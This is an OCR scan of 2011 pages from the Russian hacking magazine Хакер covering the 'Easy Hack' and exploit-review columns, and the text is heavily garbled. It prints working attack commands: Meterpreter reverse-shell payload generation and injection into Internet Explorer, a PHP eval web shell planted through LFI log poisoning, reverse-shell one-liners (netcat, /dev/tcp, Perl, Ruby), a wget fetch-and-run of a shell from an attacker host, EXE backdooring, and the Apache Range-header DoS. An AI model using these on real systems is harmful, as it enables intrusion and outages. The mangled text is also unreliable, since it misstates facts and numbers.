также был во комnлекте! присовокупить платок у для компьютеру, запустить HypeгTermiпal от сверху стройками 015200:8п:2 равным образом зачать печатать, помня,

Ее да мы со тобой добавляем потом строки tick _co uпteг=О .

сколько сам за себе байт так тому и быть получи символ, а остальной получай атрибуты. Чтобы было

Добавляем устройство Mou se RefComp на оборона ект равным образом настраиваем его получи и распишись

удобнее пробов ат ь , моя особа напи сал преетенькую программу для того вывода

нашу частоту во 00 М Гц (по умолчанию стоит только гармоника 000 МГцl- во фай­ ле ps2iпteгface увеличиваем на 0 раза значения констант DELAY100US,

DELAY20US, DELAY63CLK да DEBOUNCE DELAY. Тепе ь мод ль готов Деrюнстрационная

nporpartrta для того

вывода стихи а возьми искусство кино

YGA

jсом1

Закрыть nорт

Цвет символо..----------,

Цвет Фон,;.----------,

Р" Красный

Г Красный

Р" Зеленый

Г Зеленый

Р" Синий

Г Синий


ВЗЛОМ/ЕАSУНАСК

Тюри н <<GreenDog» Алексей, Digital Security

[twitter.com/antyurinl

ЗАДДОСИТЬ ВЕ&-СЕРВЕР

Eii.iatA\!tA1 ЪА,

РЕШЕНИЕ

во вкусе однова тем, который инициировала куча заnросов при помощи серверы

При слове <<DDoS» разом всnоминается август, тот или иной оказался

nоисковика, ото ась? атакуемый сайт nадал nод DDoS'oм. Для усиления

получай монстр скандальным за части атак, связанных вместе с отказом на

да ускорения выноса сайта предлагалось во качестве <<контента>> для того

обслуживании. Новости особенно nестрили заголовками об дырке на

загрузки удосужиться файлик сильнее да скидывать сращивание nри

Apache. Неудивительно, так-таки голос ну зачем ж что касается DDoS'e всех основных веток веб-демона, 00% ресурсов которого были установлены на Сети. Под проблемку вместе с гапgе'ем ко Apache бегом появился целостный султан

ответе через Google. Ситуация снова паче усугублялась тем, ась? на лагах

сnлойтов на различных вариациях. Правда, с целью пентестерских целей

SQL-инъекции, никак не оnасаясь, что-нибудь его вычислят. При меры:

побольше интересной оказалась моторесурс на видескриnтак nmap'yhttp-vuln-cve2011-3192.nse (доступна для официальном сайтеl . Не

0. https://plus.google.com/_/sharebox/

образом, атакуемый был, в области сути. анонимен, равным образом был в силах nроводить всякие

liпkpreview/?c=<S ITE >&t=l&_reqid=<RANDOM_NUMBER S>&rt=j

заваливая цельный ресурс, симпатия проверяет его дыряв ость.

В августе был выложен уже единовластно представляющий интерес скриnтик, реали­

0.

зующий DDoS вследствие Google (goo.gi/ U9c3K I. Если сообразно nорядку, ведь ребята из

атакуемого сайта фиксиравались IР-адреса поисковой системы. Таким

https://images2-focus-opeпsocial.googleusercoпteпt.

com/gadgets/proxy?ur l=<S ITE >&coпtaiпer=focus

IHteam нашли пару дырок на сервисах Гугла равным образом сообщили об зто м камо

следует, а им объединение каким-то причинам невыгодный ответили. И, во вкусе сие свойственный во

Здесь <SIТE>- прозвище атакуемого сайта,

<RANDOM_NUMBERS>-

околохакерских кругах, сведения борзо nопала на nаблик, несомненно уже

случайное число. Подробности равно видеодемонстрация доступны объединение

купно со утилитой, которой многие безвыгодный поленились воспользовать-

линку goo.gl/f67F1 . Интересно, сколько nосле публикации тулзы IHteam

ся . Баги были за своей сути nростые: помощью сервисы

специалисты Google аллегро связались от ав т орами, извинились ради не­

Google допускается

подложить контент из любого сайта. Прилагаемая тулза занималась

сноровистость и, само собой, пофиксили до этого времени баги.

D: '\.pl•j'\.EBS'\.beta_l'e lease )nmap -scl•ipt=}1ttp-vнln-cve2011-3192 Starting Nmap 0.51 ( http://nmap.org ) at 0011-09-12 00:58 Nmap scan l'epo1•t fo1• ·---- --- .... --~· ( --~· _______ ) Host is нр (0.0019s latency). PORT STATE SERUICE 80/tcp open http : http-vнln-cve2011-3192: : Apache byterange filter DoS: UULNERABLE Nmap done: 0 IP address (1 host

нр)

Rнssian

-рТ:80

Standard Time

scanned in 0.80 seconds

Хе-хе-хе . Кто-то безграмотный успел пропатчиться

ХАКЕР

01 / 054/ 001 0


EASY НАСК

ПОДМЕНИТЬ КУКИ &РАУЭЕРА

lf.•JJМi!t.ll hA J

му каналу. Н об вона зачем интересно: чай сообразно НТТР пишущий сии строки эдак а можем задать Уже пару номеров я занимаемся изучением атак бери клиентов, рабо­

куки. А что такое? будет, даже если задаваемыекукибудут заключать один в одного

тающих по части защищенному НТТРS- соединению, изыскивая возмож­

имена [а вот и все домены равным образом пути]? Правильный ответ-кукибудут заме­

ность надыбать куки. В расширение темы увидим для достанет

няться. Таким образом, nроведя какую-нибудь МIТМ-атаку бери жертву,

интересное нрав браузеров быть наложении кукисов изо разных

не грех понудить ее инспирировать НТТР-соединение ко серверу да

протоколов [НТТР равно HTTPSI да такое важное нива куков во вкусе << domain >>.

насолить на форточка ответа ото него поле- << Set-Cookie>> не без; вредо­

Если обратится для теории, ведь край

<<domain>>используется

в целях

носными данными. И сие замениткукиот защищенного соединения!

задания отдельного домена тож группы, несравнимо с годами будут

Для зачем сие целое может присутствие годиться? Если пропустить специфические

идти куки. По идее, владение надо держать юриспруденция от тавить куки

ситуации, так обе сии особенности браузеров позволяют nроводить ата­

лишь только получай себя. То кушать землевладение

ки держи клиентов. Конкретно во томик случае, от случая к случаю бери атакуемом портале

example.com

неграмотный может укреплять ~а поддо­

мены [web.example.coml сиречь оставшиеся домены [example2.coml. Так оно равно

находится небезупречность <<session fixation >> [то кушать недостаток смены

убирать . Но поглощать интересная возможность- выставитькукидля домена

идентификатора пользователя задним числом его входа на систему], да близ этом

паче низкого уровня [а верней на группы]. Поясню получи около мере: web.

таки да нет допустимость возбуждать н а ответы ото сервера кли­

example.com

может поставитькукидля

подгруппой, куки, в области от тавленны е держи

равно возьми

example .com. Или, во случае с example.com, будут отходить

web.example.com. Запомним сие да п ерейдем для поведению браузе­

е нту. Кто-то может заме тить, что такое? ба г равным образом сие го класса стоит редки. Но равно как однова на днях моя особа ес такую порядочно крупном зарубежном сайте. По статистике, подобным недугом страдают многие потенциал

яр для различных пр отоколах. Как я знаем, куки, установленные соответственно

[особенно интернет-магазины] , идеже предусмотрена реальность вы­

HTTPS со флагом <<Sec uгe>>, будут изображаться всего сообразно защищен но-

полнять какие-то поведение до самого входа на систему.

ИНЪЕКТИРОВАТЬ ...СВОЙ КОД

В ПРОИЭВОЛЬНЫИ ПРОЦЕСС 1. Генерим непременный нам mеtегргеtег геvегsе -шеллкод да коди­

Если побеждать недавний файрвол, в таком случае еще сие сейчас невыгодный нетрудно про­

руем его на правильном виде:

грамма чтобы блокировки входящих равным образом исходящих портов. Бранд­ мауэры nроверяют, какое прямо ливрезон пытается выбраться через те дырочки , которые остаются открытыми на системе. Усло­

вимся из задачей . Доnустим, ты да я имеем пользовательский доступ к серверу во какой-то закрытой мережа равно нам занимательно ударить получи врага

. / msfpayload windows/meterpreter/reverse_tcp EXITFUNC;thread LPORT;SSSS LHOST;192.168.e.l R 1 ./msfencode -а х86 -е x86/al pha_mi xed -t raw BufferRegister;EAX

окрестные хосты. Первым делом, понятно же, надлежит определить правила файрвала да какие приложения разрешены. Если глотать воз­

0. Открываем у себя порт, с тем думать ко нне кт с жертвы :

можность- смотрим самочки политики достоинство статистику соединений

[netstat -naol. После обнаружения прил ожений равным образом доступных им портов надобно выполнить << nодмен у>> . То лакомиться нам нужно,

./msfcli multi/handler PAYLOAD;windows / meterpreter/re verse_tcp EXITFUNC;thread LPORT;5555 LHOST;192.168.e.l

в надежде фаер думал, в чем дело? сие легальная nрограмма бин дит порт, а безвыгодный

0. Ну, а далее- инжектим шеллкод во необ ходимый нам течение [IE]:

наша зло-утилита :]. Старыми, так же действенными способами обхода таких фаеров яв­

ляются code да dll-injection. По сути, данными техниками автор изменяем/

syringe. ехе -2 PYIIIIIIIIII...lVSVXEPM PID_IE

добавляем функционал про существующего легального ПО. Что еще интереснее, я можем создавать сие <<на лету >>, так принимать переменить процесс,

Здесь:

находящийся на памяти. Конечно , пользу кого сего для впущенный судебное дело

подобную активность. Как в частности происходит инъекция, аз многогрешный далеко не буду

PYIIIIIIIIII ... lVSVXEPAA- сие сгенерированный нами шеллкод; PID_IE- идентификатор процесса iexploгe.exe [можно испытать в tasklistl; -2 -режим работы syгinge.exe интересах инъекции шеллкода во сто­

объяснять- во Сети всё-таки мирово расписано. Перейдем ко практик е.

ронний проце сс.

у нас должны существовать определенные права. Кроме того, требуется владеть в виду, сколько отдельные люди продвинутые системы безопасности мониторят

Тулзов, реализующих инъекции, ахти много. Сегодня пишущий сии строки

поживем — увидим syгiпge [ Ьit.ly/IBQ E ЗD I . У н ее очищать интересная возмож­

Подсаженный во 0 Е код- <<первая сту пень >> mеtегргеtег'а, которая

ность- возлюбленная умее т трудиться от шеллкода м, некоторый был сге н ерирован

исполнится равным образом nодконнектит ся ко свой ему серверу, соответственно со ле что-что подгру­

во msfpayload. Если точнее, ведь вместе с тем, что-нибудь получен из аргуме нтом alpha _ mixed. По следний используется во-nервых интересах того чтоб п эйлоад

зятся отдельные люди модули. Далее , имея нате руках mеtегргеtег, ты да я свобо основание

безграмотный задетектили антивирусы, а на втором месте воеже держать реальность

роутинга. И безвыездно сие на огибание файрвала равно антивируса

отразить пэйлоад на виде текстовой строки . Syгinge- сие по образу и подобию

можем раскрутить атаку равно нате окружающие хосты, используя потенциал

:1.

Стоит отметить, ась? у Syгiпge убирать иные режимы работы. Если

утилиты shellcodeexec [мы в отношении нем сделано писали], а позволяющий

эксплуатнуть <<-3>>, в таком случае syгinge довольно инъектировать самолично на себя [то

свершить инъект пэйлоада безграмотный лишь во себя, да да во с все так же кто про­

поглощать хорэ заниматься в духе shellcodeexec]. Режим << -1 >> как и интере­

цесс. Имея во запасе такую тулзу, да мы из тобой можем выходить с системы.

сен, некто инъектирует во не нашего сукна епанча nроцесс DLL'кy, ась? может бытийствовать

Рассмотрим пример. Мы определили, что-то у lnteгnet Ехрlогег'а кушать

полезно. Как я знаем, от через

msfpayload

пишущий сии строки можем из г енери­

допустимость выхода во Сеть. Попроб уем проинжектить, ко примеру,

ровать DLL'кy со необходимым нам пэйлоадом . Другими словами, сие

mеtегргеtег на заглохший

противоположный вариант, правда, симпатия похуже первого , этак в духе DLL'ки на

IE

да образовать прикрепление не без; любым

хостом. На пра ко подергивание е э в таком случае достаточно насмотреть приближённо так:

ХАКЕР

01 / 054/20 01

основ ном мониторятся равным образом палятся антивирусами получи уро вн е ФС.


ВЗЛОМ/ EASY НАСК

ПОЛУЧИТЬ ДОСТУП К WEB-CEPBEPY, ИМЕЯ LFI-УЯЗВИМОСТЬ В СКРИП Т Е

LFI [Local File lnclusionl- достато ч только расnространен н ая дырка,

:cg~~

а~:

nрисущая скриnтовых языкам, а отчего барином расnространенная на

<-~:-.;.

~-·г.:..fs_:::::~::rr::._ , :

<:~~;

~~а- r:_~~:.=Fз

Сети . Как известно, скриnтовые языки nозволяют в лету nодгружать

;...r:с-::.з:?

::.-::::--._-=::::. <:t:.:-.:;: -:: .. а:..,:_~:::::::"'"::..' ;

на начаточный план отдельные люди сценарии, который то и дело исnользуется nро­

, ; :>

:::.~2 . :..s: . :..э: . :..2S< 'з

~азз·;::::d:

->1:..92.:..6:.:..::<.:..29 '.=:

;:с.з.з···:::з:

: ..

[

граммистами.

Проблема, как бы сие как всегда бывает, кроется на недостаточной

nроверкеnользовательского ввода . Как nодтиn инклуда,

Ввод им для од вм е сто лоrи нате

LFI nо ­

зволяет nодгрузить контент всего только вместе с того но хоста [в крест через RFII. Но nодгрузка скриnтов- снова невыгодный выnолнение команд получай сервере.

умолчанию многократно достуnен для того чтения всем. П робуем авторизиро­

Классический сnособ nерейти ко удаленному ваша сестра n олнению команд ­

ваться получай тестовой машине, ис n ользуя з н акомые искажение н ды:

приплюсовать какой-то шифр во обложка для сервере, а после подг р уз равным образом ть дан н ый файл после

LFI. Чаще общем исnользуются логфайлы веб-сервера.

<? ph p eva l ($_GET[ cmd ] ); ?>

Отnравляем получи сервер заnрос от необходимым кодом, некто сохра­ В итоге nолучаем заnись во лагах, которую я можем инклудить .

няется на журнале- да автор его nодгружаем. Но мошенническая проделка сей достанет

Стоит обозначить равным образом нагота и босота сего сnособа. Во-nервых, логфайл отнюдь не

старый. Что убирать новенького? Могу рекомендовать « вариацию возьми тему »

вечно достуnен инклуду [по разным nричинамl, а во-вторых, nере­

со исnользованием логов авторизаций SSH-cepвepa. Если держи атакуемом сервере поглощать дух

OpenSSH , в таком случае наш брат можем

даваемаякоманда выполнитьсятрижды,таккакзаnисейотодного

nодключиться для нему, указав на качестве имени nользователя безграмотный ­

коннекта склифосовский аж три. Кстати говоря, во самом файле логов

объезжаемый нам код. А подальше во вкусе обычно: подложить его инклудом.

непрестанно хранится интересная инфа, которая может nозволить раз­

Файл логов большей частью лежит на /vaг/log/auth . log и, что такое? с гонором к нас, по части

скручивать атаку бери прочие механизмы локальной сети.

'~j•

-1 ,_,с, -1- -1·' l•t

··1•

-1

,_,с,

,,Ji•ll-11.'c,J -1- -1:: l•t ooli•II-11_:.J

-1

,_,с,

-1::

F,;ll~,J

lJ,~I · ··j·lij• ~,.;l •!_•:ETI• m•IJ' -,_ f10111 0~•.' 0•:.:0:.1'~•0 0 ,; .. ,;~ t"' lli.dll•l ti'~J · ' j•I1J• ~,,;1•!_••EТI(m•ll' '· fгom 0"=•2 0•5:0:

F.;ll~•l

j•.;_,ow•_,,,j f,_,,

I11<1l1,J

0с•о

0 po1t

0•:·З

0'") 0

:::32~•0

.,,

j,_· ·:~1•

-

-.

с,,:,

l•t _,oJi•ll-11-'cl

lll•dll•l

llo<?Г-

'j•I1J•

<?,,;1•!_•-•EТicm•ll'

'· f10111

0с•.:.

рогt

::·:.29

Н а ш ко од на логах

СПРЯТАТЬ (И НЕ ТОЛЬКО) ФАЙЛЫ В NTFS

ем.ьйr.w r .... -

РЕШЕНИЕ П ростейший сnособ из n рята ть какую-то информа ц ию на

.1111

NTFS- по­

ADSI. Трюк стар на правах непосредственно мир: ему поуже побольше 05 ле т. Те бородатые дядьки, кто такой программирова л на те г насчёт д ы. подтвердя т , в чем дело? сия возмож­

ность была добавлена во файловую систему к совместимости с системой яблочников. Сейчас альтернативные nотоки создаются редко. Кратко nро­

бегусь по мнению основным тонкостям равно nримерам исnользования скрытых nотоков. Во-nервых, если создается обложка во системе , факты заnи­

сываются во нормальный nоток $DATA . Любой, пусть даже <<бесnравный»,

Админипратор: C :\Wi пdows\ System32\cmd . exe -

ложить ее на вариант равно во н ый nоток [A iternative Data Stre am, ну да л ее 1

0

C:'-ATI>eclю

":;one :;ect•et:;" > te:;t . txt:aaaa.txt

0

C : '-ATI>nore < te:;t . txt:aaaa.txt 11 Sone secl'ets 0 '

~ aaaa .txt - M icrosoft W ord

0 ~айл

.Qрав ка

~ид

Вп~в ка

Фор_мат

С~рвис

!абли ца

nользователь может образовывать дополнительные nотоки для файлам , nричем инда ко тем, ко которым у него n рав, п что до сути, нет. Во-в т орых, и н конструкция ц ию во n отоках мож н относительно н е только лишь храни т ь, же равно из-за n ускать.

Д а л ее, n отоки не возбраняется соз д ава т ь вроде для фай л ам, эдак да для ката л огам

[ хоть бы с n осле дн их из-за n устить ф айл н е сообразно л учится ! . В - ч е т верт ы х,

J•I·1·2·J·З·

"зоmе

I

·4·

J

·S·

J

·6•

J

·7·

0

·8·

0

·'3·

зе сr е tз"

размер настоя щ его фай л а н е мен автор ется, а прово д ник н е отобра ­ жает доnолнительных потоков. В-nятых, nри n ересылке файло на , наnример, соответственно почте иначе говоря бери флешку, коnируется всего трафаретный

nоток. То глотать автор сих строк имеем шабаш гавканье т овый сnособ ради сокрытия инфы, наnример, нате работе. Малварь сим способом как и nользует­ ся, да к антивирусов

Читае м приполнитель н ые потоки, используя ссьrлки

ADS давнёшенько никак не nроблема . Теnерь nрактиче­

ские быть меры.

Записываем молитва на добавочный рой

- secrets.txt ec ho "some secret s" > t est . t xt :secret s. t xt

Читаем т екст изо потока secrets . txt more < test.txt: secrets.txt notepad.exe test.txt :secrets.txt

ХАКЕР

01/154/ 0011


EASY НАСК

Записываем исполняемый обложка во сель

dir /R

type C:\windows\system32\ca1c.exe > test.txt:ca1c.exe Кстати , сызнова одна интересная фича к обычной жизни. Всем из­ Запускаем обложка изо потока

(нужно устанавливать неограниченный путь)

start c:\test.txt:ca1c.exe wmic process call create \\.\c:\test.t xt :c a1c .exe

вестно, почто во *nix'ax [UFSI питаться жесткие ссылки [haгdlinkl в файлы, то вкушать обложка у нас действительно один, а ссылок бери него- бездна .

При нежели раскиданы они могут присутствовать в области всей системе. Так во во

NTFS такая Так на правах безграмотный до сей времени nрограммы nоддерживают доnолнительные потоки,

выполнимость как и есть, только n очему-то симпатия <<забы л ась»

равным образом одиноко далеко не исnользуется . Единственное приостановление ради

NTFS-

может вынырнуть nроблема из их открытием. Но возлюбленная решается ради вычисление

жесткие ссылки могут присутствовать только лишь для одном логическом диске. В ХР

создания символических линков не без; nомощью

сие делается так:

mklink.

fsutil hard1ink create

mk1ink 0ink_fi1e .txt test.txt:secrets.txt Раньше встроенных сnособов на nросмотра nотоков во винде никак не

новая_ссылка исходный_файл

Начиная со Vista, сие делается утилитой mklink не без; аргументом '/h ':

было -теnерь а интересах сего позволено восnользоваться стандартной

командой интересах листинга директорий со аргументом /R:

mk1ink /h

новая_ссылка исходный_файл

ПОЛУЧИТЬ ШЕЛЛ СТАНДАРТНЫМИ СРЕДСТВАМИ

lf.•Jif.litfl --JЪJ

РЕШЕНИЕ Пару номеров вспять наш брат исследовали всякие ниндзя-трюки во кон­

Кроме того, от nомощью любых скриnтовых языков [регl, awk, shell равным образом т. д . l безо каких-либо проблем реализуется шелл/реверс­

соли

ш елл.

Wind ows . Было

бы неnравильно прекратить лишенный чего внимания *пiх­

системы. В н иксах объединение сравнению от

Windows

стандартных возмож­

ностей nруд nруди- сквозь балка к тому дело идет nрактически все. Мы ж е традиционно коснемся асnекта nолучения удаленного шелла.

Это не раз иногда необходимо, наnример, с целью развития атаки через какую-то чувствительность держи сервере, позволяющую n росто выnолнять

Реверс-шелл получи и распишись

Ruby: ruby -rsocket -е 'exit if fork;c=TCP5ocket.new("192.168.e.l", "5555");whi1e(cmd=c.gets);IO.popen(cmd,"r"){liolc.print io . read}end'

команды. Посуди сам: n олноцен ны й ш еллвсе гд а несравненно удобнее, чем всякий второй палочный вариация для того выnолнения команд. Ниже автор этих строк бурно пробегусь равно nриведу основные наnравления nолуче­ ния шелла. Для nримера назначим хостом атакующего

092.168.0.1.

Начнем из самого nростого: Бинд-порта

nc -1

у жертвы из

-р веве -е

Реверс - шелл.

nc -1

редиректом

на шелл

Чтобы отнюдь не заморачиваться вместе с набором заключение во рента да nри э т ом

'/ bin / bash'

Открываем

речные ворота у

нахватать благонравный ш елл, не возбраняется найти работу заготовку вследствие

атакующего

0555

Реверс-шелл.

Perl : perl -е 'use Socket;$i="192.168.e.l";$p=5555;socket{S, PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S, sockaddr_in($p,inet_aton($i)))){open{STDIN,">&S");open( STDOUT,">&S");open{STDERR,">&5");exec{"/bin/bash -i");};'

То но самое нате

wget,

от­

правив ее получай исnолнение интерnретатору .

Открываем пристань

nc 092.168.e.l 0555

Если nараметр «-е>> на

у жертвы

wget -0 /tmp/shel l .php http://192.168.e.l/good_php_shell. t xt && php -f / tmp/s hell.php

'/ bin / ba sh'

netcat

недостуnен, не запрещается восnользоваться

nеренаnравлением ввода-вывода при помощи

П оследний вариант, кто автор мо г у nредложить,- реверс-шелл

FIFO :

от Xteгm. Подключение хорош nроисходить сверху

0001

nорт:

Реверс-шелл минус -е

mknod Ьр R; nc 092 .168.e. l 0555 е<Ьр l _! biл/bash l >bp Если

netcat

У атакующего

Xnest:l xhost +iр_жертвы

недостуnен совсем, то:

У жервы

Реверс-шелл вне

netcat /bin/bash -i > Jdev/tcp/ 092 . 068 .e.1}5555 > e<&l 0>&1

Как позволяется видеть, возможностей пользу кого nолучения шелла кусок

0-й вид от telпet

mknod Ьр р ; te1net 092.168 .e.l 0555 е<Ьр

xterm -disp1ay 092 . 068.e.l : l

0

:1.

/bin/bas h l >bp

ВНЕДРИТЬ БОЕВУЮ НАГРУЗКУ В ЛЮБОЙ ЕХЕ-ФАЙЛ Не таково издревле у

msfencode

n оявилась допустимость вводить

./msfpayload windows/meterpreter/reverse_tcp LPORT=5555 R 1 .jmsfencode -а хВб -t ехе - х cmd.exe -k

nэйлоады вехе-файлы без участия nотери функцианала nоследних. Это отличается с того, зачем было дотоле . Тогда ото ехе - файла оставались,

Здесь:

по части сути , только лишь резерв [иконка, оnисание] равно начальный размер, да

-х -указание получай исnользование стороннего темnлэйта[ехе];

исполнялся только лишь nэйлоад. Теnерь а nэйлоад может исnолняться

-k- заnуск

nар.аллельно во другом n отоке nроцесса.

Все не мудрствуя лукаво да малограмотный в особицу заметно:]

ХАКЕР

01/154/2011

nэйлоада во отдельном nотоке.


Павлюка Александрович livinside.Ыogspot.coml

ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Дима Михайлович

0115612, дер .

Красная звездочка, д.11

ЭКСПЛОИli Каждая найденная небезупречность да и оный и другой намалеванный к нее эксплоит совершенно ближе и ближе подводят нас ко пониманию природы ПО, мотивируя для совершенствованию кода. Не будем уходить ото сего увлекательнейшего процесса да рассмотрим за этому случаю несколько новых экземпляров изо области эксплоитостроения.

0

Множественные уязвимости в MeasuresoftScadaPro

границы корневой директории. И всё-таки сии уязвимости были найдены

токмо присутствие тестировании команд одной изо кате г орий. Возможность

~5

CVSSV2

011111 01 0111 0111 0111

атак ти п а переполнения грудь существует, быстрее всего, изумительный всех командах по вине использования функций

sscanf равно stгcpy :

011 01 [AV:N/AC:L/AU:N/C:P/I:P/A:P]

[]1Ш

!3!34!3AII09

Последнее период на кругах информационной безопасности таким образом

!3!34!3A!3DD !3!34!3A!3DE

фешенебельно дебатировать баги во различ ны х SСАОА-сис т емах, вишь равным образом автор ре­

!3!34!3А!3Е3

шили малограмотный тянуться в обозе ото трендав да сообщить об том, в какой мере дырявы

!3!34!3А!3Е4

LEA EDX,DWORD PTR SS:[ESP+ 08 ] PUSH EDX PUSH service. !3!3б7D484 "%s " PUSH EDI CALL service. !3!34192FB sscanf

они подчас бывают. П озволю себя повергнуть выдержку с Википе­

дии, для того чтобы у всех уже, наконец, отпали вопросы что до том, что такое? но такое

SCADA . SCADA- сие программный пак ет, обреченный для разработки или — или обеспечения работы во реальном времени сис т ем

!3!34!3А114

сбора, обработки, отображения равным образом архивирования информации об

!3!34!3А118

объекте мониторинга иначе управле ния . Короче говоря, зто автома­

!3!34!3А11А

тизированная система, которая, как бы правило, у правля ет либо — либо по­

!3!34!3А11С

могает регулировать какими - так сложными системами равно процессамина

!3!34!3А12!3

nроизводстве да сложных технических объектах. Подобные задачи

!3!34!3А122

решает равно nродукт ScadaPгo с компании Measuгesoft. Ш аловливые

!3!34!3А125

ручки хакеровдобралисьи давно него да обнаружили затем не мудрствуя лукаво тонны

!3!34!3А128

разных уязвимостей!

!3!34!3А12А

IJ34!•Jii

LEA EDX, DWORD PTR SS:[ESP+2!3 ] MOV EAX, EDI SUB EDX, EDI LEA ESP,DWORD PTR SS:[ESP] MOV CL,BYTE PTR DS :[ EAX] MOV ВУТЕ PTR DS : [EDX+EAX],CL ADD ЕАХ, 0 TEST CL,CL JNZ SHORT serv ice. !3!34!3A12!3

Эксплоит д оступен до ссылке: alu i gi.oгg/poc/scadapгo 0.zip. В

В рассматриваемой системе рядом сутствует служба подина н езамысло­

архиве лежат упражнения коман д интересах передачи серверу, от п омощью

ватым н азванием seгvice.exe, слушающий пристань п по отношению д ном ером 01 034.

которых достигается эксплуатирование описанных вперед ба го в:

Этому сервису не грех подавать некоторые люди искажение нды , разделенные на груnпы. Группу определяет второстепенный посланный бай т, а п ервый

nc SERVER 01234 < sca dapro_1b .dat

обозначает саму команду. В nроцессе бревно ти рования сих команд

; разгадать c :\boot.ini nc SERVER 01234 < scadapro_1c.dat

экспериментатор подо ником aluigi сделал столько различных уязвима­ стей, что-то инда невыгодный протестировал их все. В основ н ом э т относительно были уязви­ мости вроде переполнения буфера, исполнения заключение равно выхода ради

050

; сложить c :\evil_file.t xt nc SERVER 01234 < scadapro_1d . dat

ХАКЕР

01 /154/ 0011


ОБЗОР ЭКСПЛОИТОВ

Accept-Eпcodiпg: Соппесtiоп:

gzip

close

Обрати чуткость бери используемый тогда маргиналия Raпge. В нем указываются перекрывающиеся диапазоны байтов, изо которых в итоге соберется контент. В сочетании из используемым gziр-сжатием

IAccept-Eпcodiпg: gzip] нате операцию сборки затрачивается слишком много памяти. Например , если бы на заголовке Raпge передана тысяча диапазонов, в таком случае

Apache пытается поверстно стиснуть первый попавшийся диапазон,

выделяя на каждой операции гипертрофированный до размеру буфер. Спустя некоторое времена было таково но обнаружено, что-нибудь такого склада но уязвимости

подвержен устарев ший текстовка Request-Raпge, подпора кото­ рого оставлена про обеспечения совместимости не без;

Netscape Navigatoг

0-3 да MSIE 0. По умолчанию эксплоит делает требования для корневой странице

сайта, равным образом позтому может нести протоколы и заботы безвыгодный везде. Но сие усилий трансформировать :

нужно только откорректировать авторитет переменной $р, на которой содер­

«HEAD 0 << HEAD /robots.txt НТТР/ 0.1 >> либо — либо бери остальной заведомо существующий URL.

жатся заголовки будущего запроса, например, изменить НТТР/ 0.1 >> бери

Если твоя милость являешься счастливым обладателем сервера от

Текст ф ункции да з оригинального сnлоита, убивающего Apache

Арасhе ' ем , так рекомендую обследовать его получи и распишись присутствие зтой баги равным образом при­ нять меры. Провериться дозволительно таковой командой: удалить

;

c :\valid_file.t xt SERVER 01234 < scadapro_1e.dat

пс

$ curl -I

шибануть пotepad

удаления/запуска файлов.

0

" Raпge: bytes=0-1,0-2" -s www.example.com/ grep Partial

Если на отрицание получи и распишись текущий интерпелляция приходит

Спустя порядком дней затем релиза РоС появился соответствую­

щий устройство Metasploit, каковой автоматизирует процессы создания /

<<206 Paгtial Сопtепt>>, в таком случае

тебе невыгодный счастье улыбнулось да твой сервер раным-рано сиречь поздненько попадет лещадь раздачу. Кроме обновления веб-сервера вплоть до версии, идеже буква ба га исправле н а,

существует сколько-нибудь способов защититься. Расскажу пр насчёт них во со­

.,.,,Jdjfi Measuгesoft ScadaPгo

robots.txt

ответствующем разделе.

<=4.0.0

if.)ь11Jfi

fi•J!Iij[•J:I

Веб-сервер

Обновления ото разработчиков ноне безграмотный последовало .

ДО

Apache версий 0.3.х, 0.0 . х на п лоть впредь до 0.0 .64 равно 0.2 . х вплоть

0.2.19.

fi•J!Iiit•J:I Удаленный браковка во обслуживании веб-сервера Apache

0

Если у тебя в сервере используется пgiпх, в таком случае дозволительно выдать волчий билет ему проксировать опасные заголовки со через таких директив:

~8

CVSSV2

011111 01 01 011 011111

0111

proxy_set_hea der proxy_set_header

Raпge

"" ;

Request-Raпge

IAV:N/AC:L/AU:N/C:N/I:N/A:C]

llil1Ш

Для самого

В конце августа во рассылке

Full Disclosuгe появился презанятный

скрипт, который-нибудь начисто кладет приземленно по сию пору веб-серверы

Apache,

вплоть по новейших 0.2.х. Это достигается отправкой

Apache

"" ·

'

дозволяется принудительна просеивать аншлаг

Raпge рядом помощи mod_headeг (<<RequestHeadeг uпset Raпge>> и <<RequestHeadeг uпset Request-Raпge >>) либо — либо помешать длинные последовательности Raпge при помощи mod_гewгite:

множества сознательно сформированных запросов, обрабатывая

0

которые, сервер молодцевато съедает всю доступную память, неграмотный давая быть

Вариант

зтом окей действовать ни себе, ни другим сервисам во

RewriteEпgi п e Оп

системе .

Rew rit eCo пd %{ HTTP :Ra пge}

Использова ть его довольно просто:

bytes=0-[0-9]+, [NC,OR] bytes=([0-9-] ,){4,} [NC,OR] RewriteCoпd % {HTTP : Raпge} bytes=[0-9,-]+,0-(, l$) [NC] RewriteRule .? http ://% {SERVER_NAМE} / [NS, L,F]

$ perl ki l lapac he.pl www.example.com 00

Вариант

IJ:J4!•Jii Ориги н альный адрес скрипта позволено повернуть по мнению ссылке goo.gi!DK1gA.

RewriteCoпd % {HTTP:Raпge}

0

RewriteEпgiпe Оп

Параметр часть раз в год по обещанию - атакуемый хает, параметр факс два­

RewriteCoпd %{ REQUEST_METHOD} л( HEADIGET)

состав потоков, путем которые будут долбиться запросы. Сами

RewriteCoпd %{HTTP : Raпge}

а требования выглядят следую щим образом :

[0-9] *)+ RewriteRule

HEAD / НТТР / 0.1 Host: www.example.com Raпge: bytes=0-,5-0,5-1,5-2,5-3,5-4,< ... >,5- 0299,5-1300

ХАКЕР

01 / 054/2011

Вариант

• -

[NC] ([0-9]*-[0-9]*)(\s*,\s*[0-9]*-

[F]

З

RewriteEпgiпe Оп

051


ВЭЛОМ/ОБЗ ОРЭ КС ПЛ ОИ ТОВ

:~

0=11@11~1

Trends - [demotrend]

~ File

Edit

View

Рап

Zoom

Window

] D~ rill ~ 0~ ~ l lir 0

...

] +-

Logger Name : LOGGER 0 PRDDUCT : 05 SHIFT : 02 ВАТСН NUMBER : 02

0+ ~ 'Х 0J1o 0%ь 0 0:~ ~ fiiJ 'fl ~? IQ e1 l-t .J. :l r+-+4+- 0+-~~1

File Name : 0 00831 043015.odl

-0.99

0

0

_,J

v

0 1.50

0 0

,/1

~

/ ~ ~ nr-t!-.

//

/ _/

;У ~

р

0

,л /

} rJ

У/

Slop Time : 01/08/201014:58:15

01

0.50

/ /

0\._

Slarl Time : 01/081201014:30:15

~

0 0

,f

0

.... о

01/08/201 что касается 04:30:55.752

0

GJ0~

·-

А Н~

.J. 0. -t '"f +-< ~-+

-+!~

Help

v

0

,_

о:о~=

/

0\

n ">n

/1 / f

,__/

-0.40= -0.80 nn

~

n

.n.cn:"

i/

_1 14:30:40

г

0 J "'\/

0.00

/

,-J / ~

nnn

0.00 с-

/

nn

0.00

~
